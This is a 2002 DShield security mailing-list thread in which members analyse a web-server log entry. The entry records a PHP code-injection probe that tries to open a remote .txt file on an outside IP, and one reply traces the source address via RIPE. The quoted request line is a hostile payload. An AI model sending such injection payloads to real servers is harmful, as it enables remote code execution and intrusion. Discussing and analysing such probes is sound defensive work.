[Dshield] interesting little snippet

Ed Truitt ed.truitt at etee2k.net
Wed Jul 10 12:33:01 GMT 2002


It looks to me like a piece of PHP code to open a remote file on an IP
assigned to fh-aalen.de in read mode as a binary file - even though it has a
".txt" extension.

I googled for "muschi.txt" and found 12 hits - all in Germany.  They all
appear to be p0rn-related, and when I opened up one of them (on a
sacrificial system) it fired off about a gazillion p0rn pop-ups.

Looking up the source IP, I found the following at RIPE:

inetnum:      194.182.2.0 - 194.182.2.255
netname:      TEC-TEKNISK-ERHVERVSSKOLE-CENTER-FREDERIKSBERG
descr:        Educational institution connected to SEKTORNET
descr:        the Router Network for the Ministery of Education in Denmark

My guess from all of this is that some skoolkiddie was looking for an open
proxy to use for viewing p0rn, maybe.

Something rotten in the state of Denmark?

Cheers,
Ed Truitt
PGP fingerprint:  5368 D25E 468C A250 9833  CCD6 DBAE 9C25 02F9 0AB9
http://www.etee2k.net
http://www.bsatroop148.org

"Note to spammers:  my 'delete' key is connected to YOUR ISP.
 Also, if you send me UCE, I reserve the right to post your spew
on my Web site, with the appropriate color commentary, so that
others may have a good laugh at your expense."
----- Original Message -----
From: "Mark Rowlands" <mark.rowlands at minmail.net>
To: <list at dshield.org>
Sent: Wednesday, July 10, 2002 3:44 AM
Subject: [Dshield] interesting little snippet


> Anyone seen this before? apache 2.0.39 running on freebsd 4.6
>
> 194.182.2.11 - - [30/Jun/2002:00:03:10 +0200] "GET
> /<?$fp=fopen("http://141.18.247.23/muschi.txt","%20rb");?> HTTP/1.1" 404
202
> "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
>




More information about the list mailing list